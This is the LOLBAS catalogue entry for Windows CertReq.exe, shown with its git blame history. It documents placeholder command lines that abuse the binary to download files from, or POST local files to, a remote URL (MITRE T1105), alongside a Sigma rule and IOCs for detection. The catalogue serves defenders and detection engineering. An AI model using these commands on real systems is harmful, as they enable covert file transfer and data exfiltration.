LOLBAS/yml/OSBinaries/Certreq.yml

---
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: David Middlehurst
Created: 2020-07-07
Commands:
  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
    Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
  - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
    Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
    Usecase: Upload
    Category: Upload
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\certreq.exe
  - Path: C:\Windows\SysWOW64\certreq.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
  - IOC: certreq creates new files
  - IOC: certreq makes POST requests
Resources:
  - Link: https://dtm.uk/certreq
Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'
Create certreq.yml 2020-07-07 22:09:06 +02:00			`---`
			`Name: CertReq.exe`
			`Description: Used for requesting and managing certificates`
Generalising file paths and urls, see #10 (#422) 2025-01-28 12:15:01 +01:00			`Author: David Middlehurst`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2020-07-07`
Create certreq.yml 2020-07-07 22:09:06 +02:00			`Commands:`
Generalising file paths and urls, see #10 (#422) 2025-01-28 12:15:01 +01:00			`- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}`
			`Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).`
Create certreq.yml 2020-07-07 22:09:06 +02:00			`Usecase: Download file from Internet`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
Removing pre-Windows 10 OSs from CertReq entry, fixes #247 2023-02-25 20:19:22 +01:00			`OperatingSystem: Windows 10, Windows 11`
Generalising file paths and urls, see #10 (#422) 2025-01-28 12:15:01 +01:00			`- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}`
			`Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.`
Create certreq.yml 2020-07-07 22:09:06 +02:00			`Usecase: Upload`
			`Category: Upload`
			`Privileges: User`
			`MitreID: T1105`
Removing pre-Windows 10 OSs from CertReq entry, fixes #247 2023-02-25 20:19:22 +01:00			`OperatingSystem: Windows 10, Windows 11`
Create certreq.yml 2020-07-07 22:09:06 +02:00			`Full_Path:`
			`- Path: C:\Windows\System32\certreq.exe`
			`- Path: C:\Windows\SysWOW64\certreq.exe`
			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml`
Create certreq.yml 2020-07-07 22:09:06 +02:00			`- IOC: certreq creates new files`
			`- IOC: certreq makes POST requests`
			`Resources:`
			`- Link: https://dtm.uk/certreq`
			`Acknowledgement:`
			`- Person: David Middlehurst`
			`Handle: '@dtmsecurity'`